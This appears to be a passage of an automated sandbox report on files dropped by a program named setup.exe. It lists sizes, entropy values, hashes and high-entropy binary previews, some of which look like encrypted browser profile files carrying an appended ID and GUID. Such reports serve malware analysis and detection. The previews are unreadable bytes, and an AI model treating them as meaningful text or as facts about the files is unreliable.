              Preview:UNKRLL9.&....1..Eh)..<.gJ.........._.._/:.l.V.........F.........+.z..LL....=.x.\.=..?.#..^(.:%K.%..{........bX.. %e..,.......;3.-|<.....Nx.$.1.}.n_..X>.3/...N......h....u.....\..\oI..4...e.....d_."I...HO..eh.b./...r..Aa..f..yfB..........lyi......vqP..q..[..z+.......g..f.........J........0sq~`M.....V.Wpq.np$.d.Wi!..O.|.J.E.Z.(f.c.g^..,T.:.hA.'...N.8.m@.9..:...v>A..1...-.'..<....))yL.K[.*.4.q.x..1.es..^.R.:......g..V..;9.b........b..e.;.l..: .UG;.z.7...z.K$>..J.}.O.....I=..m.H[4q.7:VQ.9.v1.U.}.....%....".>..gXD?.@...S..j.. ..R......"...[.YMc?.k...O.......a#.....9U.j..Q.?..........W.(..u...BI....qbw%~R....J.G...6l..XSzAC?....`.T...f...D<.U..]..0#.u...c]..!.=..[..1n^-......t,|....6....B.&.,)..o......+;..u.[..~./...x>k....{..46.x.....iJ{@++..&.v..v.pV.B.......G.c...._..t..W..L{.......Fb..G.c...h..w.J[....\....{..\D...^....b.AG..Kr..^...z.S..Y.\...P..(....4....H.....}.U.}...E..%.@..c..\....&~..Y....}Nf....__.T^..ey..8!.....,.x!.{...Z...p.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.8393287159429335
              Encrypted:false
              SSDEEP:24:TxfF3+FCwIjygHzTniNTOPXwfxDy+4ran+TyyK804LTajhuXSWorutBatzkSsAbD:FfFTxuyHniNWXwfGrW+xLTal+tazkSsy
              MD5:A0003AC76A0B05257A45F848E4760E22
              SHA1:BE22C49ADE9CC70D528115759CEE6BFBEC8CB9AE
              SHA-256:CA72365141601D61E650A2E33680D4FF2B475AD77DA90DF93AA1A1580D3190A7
              SHA-512:2EFE7DB9009C2D4A698FAB3C8E6DA3E672F47228F0148F0B858CACA19C852E54FDC70B63BD00903A27A01DCE16A6D331F5A5A146609547D4EBF344D172B1BD0C
              Malicious:false
              Preview:VFMAN..:U...t.....)..'.......L...O..'..:h1.T..8......kYp.1Tr.........SI..&..C.(.....2....".h.-i:..a.SI.o..;x..+a..e.0..O.R...lQ.b.-...0V..0+...2.Fv.A..x...l.3.b...I-t..!...>S.t..q.b_o.py...V.Di5[.qe@S....s..S...bj....|.h..c]c..C........!_l.Cj..O.!D.pUJ.j.qjh....\.w..b n.%../..[`[.%......g.7M...D.5.....)C.1o....e.....=-}u...9..=^~.. @n..teH<..R..B.6..u........]..jU6q.T.....b..R-...:DU....A>D.z.Wj.1.....dZe...M..]f..w..'.`k.Xl.UE...f..m....Q.c....~D..h&2x..(...........Q2\..9;...~`..nC.&.%..t.N..@...F ..s.E.80....s..(j.Y.*....U".,b..J.....&..J7.1.Ls..W......&2.J..>-...+ W.`...R:......t3>.!.,.*C.k.).Z..$.@C-.....W.k..!9.7.Y...J,./..0.G.n....m.:.>.B[.I(m..ns...j^I.8ns.8.@...^..fy1...#.y2.ye.......T{oak..Yb..b_......u..@.n..N<.l.I.!K..iB..E..."Cr..4[).L........T.r.>VKa..h.T@.U.$..}.....C.v.)E.........o..."c..M.Z..|.6....;..W.}&..H.....r'....k..J...m7.....FnW.S.?....EU...U.r.,...V...j....aT..N?..j....jeu.......zX..|".....d..G.^.rIb....1..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.840367666148716
              Encrypted:false
              SSDEEP:24:kU2y7ZEeAirK6X/a0dMQykXtY1Gr8ewVmk/5nRtENnk02CusgbD:kUv5rKo/ddMEY4Pk/yBfufD
              MD5:73E4FF760B73A2DB7570DBBDEE9869C5
              SHA1:AEE8008B0EA7DC3D1A2381524B1A652A3D4F1106
              SHA-256:66E23B9606E479F35061AB891F89514776B105BC15BC41DBBFC9960EB862D5E9
              SHA-512:AA9AA56F2319A4B493FADA572C245DA9DBD9C0CAC8DBA18365F1AD613D311032309BDE5834B26162265A208CE33BCCE696B620B0531F08E24A73407C6A4FF46A
              Malicious:false
              Preview:VFMAN.u......PK.L...Y=...H..L....yzEV9)]..].. f#....-.. ZP..P.....pl..>..JD..n.9..dp...D.s.s[.3.^Y.T.,....+..@........v.jK?.#..._[.f1qg....7h..22......;...I.....>.L...7.o...s...Xaf..6.12.h.d.?..!.e..8.."...^6..mP[.....3....c.....2K(|x..>../E..p.....T...>. ..psq..........U......Z..v...Bc..4:k.M..S.2/..J.N.o.....q.?^..i.Y..L4~../]Dx..*T...!.....-R...n.X....`.r..2n..F.2.'A...m./...kG0.a..1-.......8;...R...[o..R.N.......^M..A.>.V..+..W....{..k.6.49....1.0K....o...E..).i...?...Ba...(.T..)xR.|..{..\.....#R...H.[..-.j........bP-..P.T4.....=...z<|........J..<xdi..B.8e$Z........9..w......+cB...g.>....D....`..&...Z..G.Kh....2eh.9.r....\..:...[......1<4N.t(r.z.~..&..,..).$..\.c&1%...;.-..L..l.|.+.c[....i.G..y..z..*S:..7z..:......7~.wX.zp....I.xN.=......voI%...u4PZBg.Y'.L}.......f...8....l...9y..d.,Z..*.-b>.oYxlk5.<.vL....S.a.x..N.D.............R.u.3.q:.....J.V./.....J|....2.Y......_c..?....ml+..C.q..vz.1.Sw...7..............&(f..R...L..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.855440095811779
              Encrypted:false
              SSDEEP:24:1C6J5L26gvfi6VAfLGtuYeboSDc+Pi+rSZK38utgDc1N7nZgcnGbD:4m5Spvfi6VLlX4L2+hVN7i0UD
              MD5:00789D9200B203DCEFDB6389DCC7223C
              SHA1:419C6D31DE490CA757452586758920DF98C28174
              SHA-256:F494B382AB76933E8BB5A5E887BF1C148AEB31CDED0E66CA9A33F73743916364
              SHA-512:2086B5045C2FCC2DDF5B63499D09B9F4566E8777A3CF6986FD7105715C942840BBA2A6D1263F4876074D1E5438BDE7EA62CF39E04B5BD92CDD4B463DE6231916
              Malicious:false
              Preview:ZQIXM5".A.K.3....0d..e............j....3n..?...`..2$. .....K8.2.?.........2."..v.....|.H.P..)..W.........-.i.Y..?...f.....+&$..j.O.+......../&x0..h...|...5.Zw[.%.BF... ....d..H.lo`.....6.........{.q..?..H.b...'.m....&<.Z.4..8..x.c~!.J.....q....7.J........+LU........[..8#}..X(.h1.-..E...t.Y....b..+.V..G.@..hj.....&qU@...Xtn.t.4..z.M...w.'(.\...^.n&?..n.{%....&K'Ho.G...E5LU.....1.m........\. Q.._..8C3......ag..l..y.) .P......_..bS.....z^..e...b.}tt.MNsA..I.<..._....P'.Mg.R......IV|...O.m......AK..\7.Y.....D..@.f.Y..G1.~.....0vr].....z........".VA..7.....3Fc....%..[....T.w.....JJ..t..Z..7...W.Q...K..<g. &@..Lu......,....bi.....}U.%.Y..o..I>.&....^..h|/.7.....s..........F......I:..8%Co,G..T..X..:ip.y.R[f..v.q..K ....&6.I...........6l..M..4....x.\....KE7.L5...=b.T .yV@-...-.)!k.Lou.d..3.3m....Oe....._.4.f...M.4.d..7.|.H./jkV.O..5.o(~.._]..K.h.........F]N...U./.Sr.|.lq.8....D.....U...........&..Gw>oF&....x...zgp..I.c..d88.P.XD.<.%..(.8R.H.f.rZ.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.844364576877165
              Encrypted:false
              SSDEEP:24:88RFRMxDM/iJwiU/YZZmHWc5rq1IbbWK0NFROB5RUfqD2GzFd1yVgzZbwFkjbD:8QRMxsiJwxWZm2c5rq4WNvaEk2GzM8kg
              MD5:DFDC57543F80B2FF3A5E7A698E456581
              SHA1:A27E93135DF5CED3E967D3A9E7D7D098B370B636
              SHA-256:60242DFBCE41C5F6BD7FEB588FDF81E0FF25E12F943B7C61835D305F9D48E8D3
              SHA-512:F771FE56B22D8CC293939A9BFA11601690765F818F9E4BE6B77056D8B19EAFCABD2BC16640CC0A83C75505D89EDF02230D78F4949A0DE5E8E508C9FC8DB1AB7B
              Malicious:false
              Preview:ZQIXM..._.!..I..:..0g..q..^...F6b.?....YK.+.b..H......Z.xG...]....>AB.T.>.Bz#j.KI"...'.F..!.3..W.$...gt....n..&.<C.E.;..L.o'y.X.]qZ...w...]...B=.9...'.......QaM.W.(..N....t....Wf.v.O.xh........(..fO.._.1.^.o> .....)8...U...~.<p.\-..K...Tf3r....H.....tQ.s....8...&....j....|.5...t.?.gJ............\)05H0:.>.!.B.)#.....>+j....Z(.....ul.....{3....t...u.c......R....w.k.N...Q).T.}......d.....x..u...jj.s....F7..![....w#..7L.t.1......n;. ....@\..)......8k..,....w@.&%q.Z...\..1..l..V"k(.....,.`F.L.O.5O..b=.On..j.......N.z.r.0(.........)...>7...D.g6r'.w..t.M1l..e..:.z5..^...`<(..@B%.+..mK8p5.+.]3......NG4..f....tdJ...|zUr+..pM.AB.k..d..\. ,@5...;..\.....O?..U2t.....L...K...G-....Dq3. .8.7.......-j.0...A.....>>..&."s.F..z.3%>.M.j.,."..PN.#.zm_.o@W...+m}..j..1....= ....uyMy.......4..P...21...}S.Q......`-\..,.v....sm..Y:%.I.r..W{.....1..~........."yx_.......1!.e...p.2`{.c~f.C0h.&.b.|nK.?....qV.z!X..gn..Q..7..gfE .@t#}.Y?...n..".8.Y..\..H..'....a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.833168803470393
              Encrypted:false
              SSDEEP:24:kPG1cIZnhnUYdTy5h/eJ/R0kHVqDd5fLb5s1cw7Dw4jPUp9OXevczEDjbD:kPGBjnUYdT6c/hYsLPHHOzD3D
              MD5:3E6F1CEDF6BFE2C782CBBE2C2D643EF7
              SHA1:0A0239F76006F44B99EA42D9C3A2D71AD259079C
              SHA-256:DDFEA3BBC2AA2908AD75D66F71279FBC86F9BBB4D668280B17FE55558DB46730
              SHA-512:17EC1D44C6C541FB441B8C7BD7FA1D66797C9F3E8582CE001C1D89A381A13E01C81EF9E0C0FE3D09BFD65354D9FB560CC3AABEA02F6304156C98980B4191800C
              Malicious:false
              Preview:ZQIXM......&..2.i.!.(.MY.-..G...s..h......Lt+x..`R...K.....B.&L?{&.4$.D.....p..|_.EH^-...MJ..bRdZn;Jd...3..9E,...0f....&..+.{..4.......d..q..X1...D.A...R...e.........\I.....O.{.Q.1_..../.......:.9....1..:.V_.K3-.....?.m ....ij.1.d.........8..mv...b..."jY|..A.CA..u..#..N.a...LXb..[....7..SL./.t...}[.?R9..|....v~....' .^.`....UT....*..?.+;C.....U=QB...*..Z..!...z.w.._.`.#.o...fVK.O..EYh...._..g......f.L`.>N....R....x..h...;..... ..4..@....dNN...7...V..S...M".........>.........F...+..QFQ....}..9.%.1Q.'...h..T..}e.@0... ;.<4...X.U.L^t.?.@.j...}....s..p....k..q,.i......Y].......s?d.z..S@I.)..gc..x....RR........E...5E.F.!..N...|.d..r..tn.M.....C+.....^...6..|M.b.....5...{..E!6w.........*.G.....d......?...F...._......d..oo..L..S.....q...cd.<.M...@N...|7.....q3..........AdGP|3Y...`.I.. .P.b..2.3'..p'....e..mOq..3....7.Z....k:.F.ff......}(...{.Cy.1lK..~'..:.....!.....?......3...E._... wA. ..._...9....7.^..#.l..W....@.-.~..N6...N\i.K.j.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3841
              Entropy (8bit):7.951417079123012
              Encrypted:false
              SSDEEP:96:2OSnSOmK+Bngqc+aIk0LOw4GAh3/rnQuaDy9QuLYGqykUuwUEL7qw:0nSOW2qeIk/PDn7QuLGhVm7f
              MD5:A84AF9D5E0D3D4090BAB29FD16C5392B
              SHA1:B2648808DDAF7923240621CA19307E5E729B9EA0
              SHA-256:BDFE5CBED40320B0B6A96189E8B2528088BB5156BC4C38372C3396BB12194D37
              SHA-512:5617BA9F42F462241CCAA11013F9FFAF13228044A378E5D35250808C30796F19783910726A4B6FF1E21CDC1E30FEA75FAC53E887A7FCED129B9F0EFF76570FE0
              Malicious:false
              Preview:mozLz.*./.}.J.......}s...Rt;.'%Z.)/F.3.yn._..o.3C'.)."@...Pvs..Z6+..0U~...%.4..m./9.L...,....m.='.._..*^DB.YJjc...~....`....5.kO......[........*.).w......3D....1.n.A0.>..)...t...0.Yx,...Me.....Yn.a.e$..a.d.(:6.s...1.He....u.'..V.....n..K.p-.D.....D".O.....w....zH.W...)...l.0....D...z{tv.._.+...@H....h)......?.\1..E.;...].}/.$.\.\H|.~.D...\...q...8...`9.W....v..\%..Q.....x.OI........)...Vy5d.2....L.:..........%....^....,..[G.0.........d2.z...'...A,...;;........ ..5...K.@.437x.Q.X....,9)$..U.bt......[.!Ram.$J1c.^...=.5........W.C...]nl...............0O...,h..UP..~....]"J9..+.mT.?s>..a......,..........F..av.-......W...{..&...S.h.#.Mj....S.9..........n.}.].....#o1..o......k......~x.I.......h^..u=...R.b.>.3.x!'../..RO..t..a.........(.T.e(L..)........e......M.n.3.......SX)...!z.......-...d.z.m.qp*..3....9...h+..Z..oyZuq*.4y.e...eK...:aq.....VX._9....".#...'.?....w1..0...."q..C.~.Q.{...J...E.....I.$....wp.:.%+...u...<u..J.#j}k,.....H..t......n..'.>
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3919
              Entropy (8bit):7.952525597809741
              Encrypted:false
              SSDEEP:96:a5IFtfyyEMvqsH1dFFRqUGQ4iOLbnApjJdU8JiR+AOVew:hg1bQ+QUSj4nXY
              MD5:CB55C162A49F6522949976E7DCC20C69
              SHA1:23B82C94D80157D8626541DB9D7680CA1634E090
              SHA-256:63A10EEC6C6B3A69FF41679ED01D51014A8DD59901F9392BDCF71CFB90EDCB08
              SHA-512:77BB1A88DF71498295A5D5F4D722070D3058C81CF9E0E154DE3C28C2CDA70DE95AFBCF0B18FC71F085ACF14A8C1D522B905144C8E03B31562AA1177BE079B9B7
              Malicious:false
              Preview:mozLz..._a. ...........b^.4.....x.. ...Q`m..D.B~T...VFi'mr.....)W...........0.....c.4....Xc..9....N.W..B...B...I..[{...^./.R.t..4..c.....vN.%...y...YF.^d.g........U......)..F.T./]5.JQ.c4..mrs..kS....1y.;....Twx..;..JW.5..Y.......T..W..L....e;-]..I..A......P]%.di}%..i.E..d......(Z(... Q..X.V...e7....z......|.i.".....#\BJG.....HW..4!v....*.c....].4A..Wy..M.....9.w..6..HA0.GX/..{g.a..I..A..@.(...{C..zw.,..>..t.a.bz..........e.`...#gd.P......T.]Q...eJ...YX-..,i.....;h..1?......N:.*&6.(..5..2.u*.9~.1n.)..J.E^,...J.....V.5.CS%6.E.].T...8B......fG.b.3..(...@.....=.m3.u.....R..GZ.Z..`K.7..........=...t.!.<`4...A...b.n.~=E.4@...}#.......v;8U.....Q.......q.r.%....Y.v.f.......2.3.........Q.Br.a6Ae.e..L..*..]G.s..C..S.._65.A....Y.o.....0.....H<.'.6.TT..Y...0.z...@......9l ..@Y.../.gXt.7<........."_;r.`.`.j.].y.....s..:...].....Na........x.....L.K.+..6../...GLgU......Z-.%..O.[..r..D.....h..2X.[j.Xm...t..^.,SuF0[.-xq1.A..$qzq`..".~..\y1m.../.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):13932
              Entropy (8bit):7.986722664473607
              Encrypted:false
              SSDEEP:384:Dh4C00TYwcgngIc0/MsycbtDUKMRzeb69E96L:Nn0+gggRr9QFEzeb62K
              MD5:13814295B4C2552DEACE116ADBD6AFFF
              SHA1:706C633966CDB77C0B1FF0B92F1A643D5B1139F8
              SHA-256:4999F65722EAEE85E4C5AD3368F4E91E8CFE3D9BB793D185F9C15832E292046A
              SHA-512:67D21917838C8E663CA8F411B8C00B8924C59EB64013281D996712EA211CB33FCC60629A7C06B49752FE984EB0E726CD03B8E896251D7BAA45C570C862B66EBB
              Malicious:false
              Preview:mozLz...pA.8tl..0.2Je..h....E.n.D...$....0IN.R.#.>.........2.9.f.@k..}.^..f....L0w..$..cky%(...p....{.)..C.....,..Qi^W....P..;<...Ia.0+)..=.=1..(.7.U.C..{...T<......b?..R........m>...2(.:.G.g...r.6...Jw....BB..x..2De...$Q7....]..g<.........w.).W..[..-.Z.LvMl-..k....B......!..TU.V.P...i9#.~e_.......5...@..&R*..IG.'.9_ys...W..qb..2./.M:........`......f<..7.^R`%..p.:A..qf}.S..w....d.......;..k.......EMI...z...#..Y....u..F.T.)..&f!..em.N.9..9)2...$...~.>.FOv.......g!..E.&...c?..<.,..Y...(q.@r2....O.,...`g...@H...K}...+....?..#......e@.0.M.N.R.--C..Zq5#.{)/V...^.......1....U4 t.s..f.|r....$.b....m4....DA.G.....F.a..jE....e..`"......32D1.........&...>h....w.D..v....in..e..R...T..........6...NcBJ..,..@<....lq.+...=..8.05.$....c.1.(&.Y...JS..).T...?4K.[...r..u...(.g.....u...i.7r.......=j..........Y...O...A.9T....Uo#....v.Jr...[.(@o.tM......!.'........I..U#".P.F0.v......MX_>....[...wc..ZXP..U.P?w..s...>.....>.....P.9..&..$.`...[...}..l.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):13928
              Entropy (8bit):7.986100975253768
              Encrypted:false
              SSDEEP:384:NoQ7nNO1TvVr0iPVy4tMh0xW4Q7qFdjWCa75y39Q/rd80sA6:N9nN/i9y4tMhXD+bWCa7+0dRsA6
              MD5:B01B36234E4A41C3BD89198A256248C8
              SHA1:6114233422448585067B1C931B93239BD59BD3F4
              SHA-256:BA8ED59FC5022CBEE63E8179443F5DC18525C3B7BBF89B7F81A549A0688CC2D6
              SHA-512:A50866ABD8FBEBB5A32B41EACB6C7D2BE5BC211FE205C037E15F5CC9B5115427445F81E6700639F464DE9FC8238F3BF8B227038E141B6A415C4A186090706353
              Malicious:false
              Preview:mozLz.;..}.....X.gE9.J.pzL......?..r.!8./.h0.F5.....=R..ac.6...x.!*.e.....q.....*.......L.m{..@..P.t. .....@....:.F.F..-@n..........W.Sd.........7I..P.p..jz ..v.R...+....9...{.\......2.%'...7..h(S6..../qOI...:..Op.E+z.RQ/%.......GeX!$-...........d....o.p.;.g....8.:Ot...^...#[.s...#*yp..V...B.VEt.....j..Q...Q.5.vtEs..J.....$hy.c.x.....+bn...5.o.v.-Il..j"W..xX.>.Z.Y.:..%..........MI.....d/.i.R7...f.Z.R..q.......?....(..\.E.F.}.?. .G..f....S.GB.3P.._:...!.WDa.......!T. ...t}~....`..w.w.......-k..z..B.."....Ac...=....l..<.....b.....v.\....HD.X..=.A....J.`..3K!a.k.MP.U..C..>Z..;....1.......rS.U....x.H......_S.*....P..KE.w...jk[...3D"..8.W.jk...0S.i..$..../0.....O.v..k-...Pr...J+..]D...%...9....5.....H....#...n..sMU..qc;T.b....n..>....3YR..M.y....B...}....&}q....K.....^:...fX6.x.S..p..&d..q._...|.2....IC..!....*4.].hMb.!../.t.../...)..D....M0..].j..=.OL..B...8..........U...H.u.......PnW?.L2..|0.q.6.....^ai...g...-.5w.......6.jUz.u.._.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):779
              Entropy (8bit):7.689615175580343
              Encrypted:false
              SSDEEP:12:omZ7d/eQ5ZsK/WAWcX6PxPQNron84dlK3B21uRC0SPiFmTWsZdhxusSGgHSBP21g:oqN5pWAO184i3B84EKFOWIdhpIW2YbD
              MD5:352A96F80CD0621274976C7DE48862E3
              SHA1:B4ED10AB042461A586517A33A550BF736E3A87C9
              SHA-256:F8C09025D1548DFAAC81A7E134AC1566255750EE815B0EE4A4EBA516A05E3B28
              SHA-512:A874F8B8583968F4A871F9EF34C83BD7514D939551C85FE8EF2D0D005F50B41E4B700B89C2E356CF3358B1CCA931A36759A51C2117E967382B72582811FF0114
              Malicious:false
              Preview:mozLz....5...J....H.......(...N....(..%...ent.'......gFh*..I.JPW2...A....^t.Q..t)..i7..6\..s.1..,..g.{OVF......x.F.....&.R?..7".YN.S(i.pA..2.uk.6.....Z.:.*.+./...t.uv9nB..m.z.W.1!..{..r."&...B:.O....c.Ut.i......D..:^V-.p.......XD...y.S.....^.w....vZR$v7....hl..+.-.d7....Q:.H+..q.m8.{Fn...1.V...n4{h.^....46.7!......v.mR5.2.u.....e.....B.z...?.."..|7..<.0.l..b..:,.gO........3.k....H.r.}5.<.....o..M..a....$g..s/.Rr....c.B+o.;E......:.....~h.H... ..h..@l~_.f......g....>.h@j.w...-@.h&........Y...4.u....A.0....e._..2..z<.%g2.s..3.u.Qu.*M...k..s..Z...ne...x..[..D7..*d.-d...h..?Q.k.\..L..~H...Q"...7..K..R.,.].9.h....c....[.t{...p>...XX.z...-u.;5.>..U...w.s$..EVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4682
              Entropy (8bit):7.951711679259806
              Encrypted:false
              SSDEEP:96:YmKMfNYxykq+Jz9r5XoaEWS66vSLpll9jwCW1PGjHolLOR/fTa:YLMfKG+756WSVvI9jwFtGjHoliNa
              MD5:7A766A5FCF74E3DAB849ABF6BA5B3C55
              SHA1:E2DF32D930DBC5DD51CCCE4384BDA3ECF29FB223
              SHA-256:BF3C09BA9D65582728D903FB9829BCB7AD460B2FAC6A61327BC8C841F0E23489
              SHA-512:32E0822C3D541FEC79B1AD281FFEB43623D71B6B5C4A6F98F0137D1F41B2952ED7B0E2A332ED0ADF512F2F4AB819F9208D5483DEE8984E2CD35C6CA59959F011
              Malicious:false
              Preview:mozLz.q.{..a..|..=e...\....P.7.rcl.R...B..........&{....E.0S.K2.....jZ....x....0..~.?s..i.~.^.qk.9...o..."...&.a.....W......<uc.......~i.....C~'2x)....Z....5.....H...B&.f.....Im....'.....<J...U._R...........I...r>..I-a......"Ho........;.{.3....&'<....5...|ck.........bu$Mo2u..o3.N.P..T...W.{.E.=.k\.B?.^.E.+..U.h.Pb..B.....Yk....KxR".p.~....+.x]..b.3.&y"6.T..0i.K..Y3.....C...'fR]..o.....aF...[.'..}...c.H...u. ...c..F3...%...^u..;.....T..YnF5.K.o.....;.<.(....TRL.p..@.>n...A..XwL..t..En...f..p.N.i.v....N.).9..m....Z........B!.\iz@...vZF....@..L..8b,R...(4q.vW...@.5/mz6t..pL/2.....$.7...b.......N.v....ofq.6h7+lw.F..Y.1.-.....Y...L0.>.L}..........qf;.q...R.x.1......,.5#07{.-....x.S..C.,.n.....uG..9....:...z.......'Z..J3...2V~...i..,.J.~<#c&|D..s..W...[......o."j.N.k..+q.........3..,......N..........2u..^k#.J.q...8L.w.J...k...xd.C.*`! ..%....@......e..g!7..6<O^..e....n;.x....|t.jf.........Ll/ ._.....,..{...4....B....!...fg......~..*h..~.J...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):778
              Entropy (8bit):7.743663205782383
              Encrypted:false
              SSDEEP:12:g/uTwTvcsgty0uw7N58cZy+coc8BA6gogCMKD4Snx4K8GVG/F26/qesMR2cii9a:g/ZTEs2Rby+M8D5/Z5nVi2ZPbD
              MD5:4C7639640D6501D957EBA7AA868A6C4E
              SHA1:C1C9862850848A9CF291EA91ABA78F5A67B8CACA
              SHA-256:981F974696AEB8401784DD1E5E9240335D2A55A1E7C489967D657EC83FF50CF3
              SHA-512:6105A47A49F5CEFF65718FC06BE5076A57E85518C1EDD2C83737C6F471E371E5344BCFC900BD7247DD1168AD7B71385640D527E5149B454F2E3805CA5D933FAC
              Malicious:false
              Preview:mozLzA.X..J..';..2A.).7<D..+...k....cc.2.u.8Q.....!.3v>.,.M.^.TD~.q......o...}........s.....qz......B:..[..R.dsp..e.....5.......y.7.,..t....v....R...=~j.e.. ..3..F.$...T.K.....Q;..s......i.v|.D...{..j.;........P. ..X}*........ ....dP.....#I..Pu.v|R...m....!.. ...7..>.6..$.....l.#.Wi...T>nA..33..]..e..j...q.G.......VY.z...B.m....Z2.x.Qx..q.i&..g..).....H5...J%..~..Bcf...jy..9Z..+H..Z5.....)^]......Q".[.[.e..``'p7m.E.h...p-B....KX8.I.......h1t$..oo....+..%.5.1...q.`A...%..{..b.....VK....#..D.H.I..HN. MmA.#.I.c.\..^/.v.t...3o..'..z...Z.|U..,..b..r.(/.....m.U..Z.I.....X...:....1..}.J.....+..4"0.3......_.|.f....0v...aC..&.HH%....u.TZ.,..A#.`.Ro..3..83.:J....#...8. ...IVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):15435
              Entropy (8bit):7.987748613876755
              Encrypted:false
              SSDEEP:384:86jUsPBkyO/atGILfLiEugZ73Sr/yQ6dxtuYsqKYdpSl:86UsPBkyOixLTo+/Q6d7Hsnl
              MD5:00D240AD84463FF201AC049ACC1EC75D
              SHA1:E6F8B43F517357C91E03301786090F3D5609EB1A
              SHA-256:9306C0455A92551DC09F26D66C8FADDBA58DDBCE9796B085D78C094DC7B58EE7
              SHA-512:694CDB2B4809C8DCD370DBDA9E358F7535B62F8D2D2F40AF3BA7698C85935DBDE3435A7032497C373CF0FC42627DE6DCCA802FAABBD6E0CD62DFF0B1E47DC7F6
              Malicious:false
              Preview:mozLz..G.._i..h.i...B^N(&.>.PY9K...j..fUx....a..d.Ij.5.UD.1k6..f_..%9.....k........>fca......E...Z..........;z:....e...H........G.....s...'.$s...oF^j..*...x..d..o..E......*w.%...&..z.....&.#............fln...1.F...X4..G.Z..t.E.....|t...^....T.8_Pd|\C.~....~.h..n.Yl"..b........3.Q>.T..F..A..w(...`..buH..W...a.&Z...z.Q......,..L6.p$...S.gJ...K.)..I..R7..p.....).>.:)..DyT...A.Z..p|.....kK.fc...~....|p.R.....I..C....v...a.p}...Eua.....u.....1V+q...ec...[|.Nh..(...-.@..^....+..+[......u"....."...=...RtGZVX<f.. .V/.j...j`N.S.u...i..BU......F"....nh1S.]e|x..m..*.|.)..E...,..>I;.<.:.u....M=.#...$s....*\{..8....W.t.6..D.`......".wL..K>Y.i..&.e....._B...c]8.A/..JB..vt..}JCK..Vd.*......GR..7.i....{....]..x..9.fDBI.....d.....AP..:..).5Z;..L.L.j(s2..A....fX.f.D.N..4.D...s...Q#&.m.(!.v..]......~..S._.K.,.$eI........N..z.]..~.xa.n.D.).'....%.>...>..OG.....p..v.....C.O`\.M......rM.o.#Q..D._...O....VjQ.Y.......E~(..;..#j...1}qh..k.=...:....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):12839
              Entropy (8bit):7.986522651468975
              Encrypted:false
              SSDEEP:384:UR/srR9OCkhwmId0MHFY7wIb1WeUWMrOdLIIhLd:UR/srR9zrd00fIb1WBLc
              MD5:2827AEAFC7F85A129182BBAD8540AE99
              SHA1:E8D32A3082D3703F176DC89E379AA36C599559E1
              SHA-256:C70EE070B1A3E572665C8120F8D0413052F9721C61734CA1D0BD360B0F5BA870
              SHA-512:95871589F0096EDB759D8289F6F7A36B048063C08D720F3AE89ABCE1244E5C6F6FCC42CB0C51113889D2D61A920186DF0DFDB710FCCFBFA061D562306CD17B3D
              Malicious:false
              Preview:......./...Ya.......$V........?rw^^..7.#.8<.bN6R..T.\d.. a...f...g.Z.F..Sq.........uR.,.l.#c(v....|..X....Y......P,..I.pv..$<..:10..Gz.)..,..kc;t.XS..#.q.........SG..J.].M26...<.x.D..V0..k..../g..@.....SL{lK..O<B.+b..*2Z..%D....5v.f9......+....3. ......Y.,3...xh$....Z...p.Sc.M.u.f..e.t:0....w..t.3j2.:.@.)E.].1"..m6..&a.h9.........XA&.6..F[.....x....Kz*Wa@.X...Wx,...kL.v>....I3;.8...\.P8&..V.HB.n?U...W.}F.<.HV.TEM./.qf....[_.x....J..l.,......1.jp.(..x.~D)_#.O......1V.bH*z/.r.8`u.5.b@q.c.......V..........=...S.dUH......\.b,C.S....+.......mb.....u.j.d..p.|.$Z..U6..v.g.x.jfE...X......(.R...X...w$m..;b......Y......v...\...tm./z../.g../....7..e/..[.\F.%UJ....3E*..MeX.A.5eJ3....=5....K......;..............Iv..[Yn...y..6..A..7....<G...z..Sp.,..u.....M.K._...B..H4O.;{........?g.......?....;0.k`um.2......8...4y]K.. .c..75.O..7.(...,S28*....+_R<efM.....g?....9...._..+.V........CL.7....G.<..f..;&....s...........'......p...M2.C.T..8..yU.@
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):495
              Entropy (8bit):7.522796018438924
              Encrypted:false
              SSDEEP:12:YWFZ0Nn53HMaXBI9fKC6rWsIgAN37scU1eUAWs9ap3MQsMR2cii9a:YO2Nn53pCtKNih121LAWJpmbD
              MD5:822817830267AAE768A361D7319A95A7
              SHA1:7E065626E1D183655C99AF1E70FB265C9A419691
              SHA-256:A2194B990516482481435F33C684C9C00A6A933465B875A12B287B513CB739D6
              SHA-512:E8C472AD895A710DF5F045BB6FC18F50F96FCF26D6B274BF789C839307D7B82961528DD49B8D37B6F19152FA5E4F77C8DE9AEAE756DAF33F2F7669743A803E21
              Malicious:false
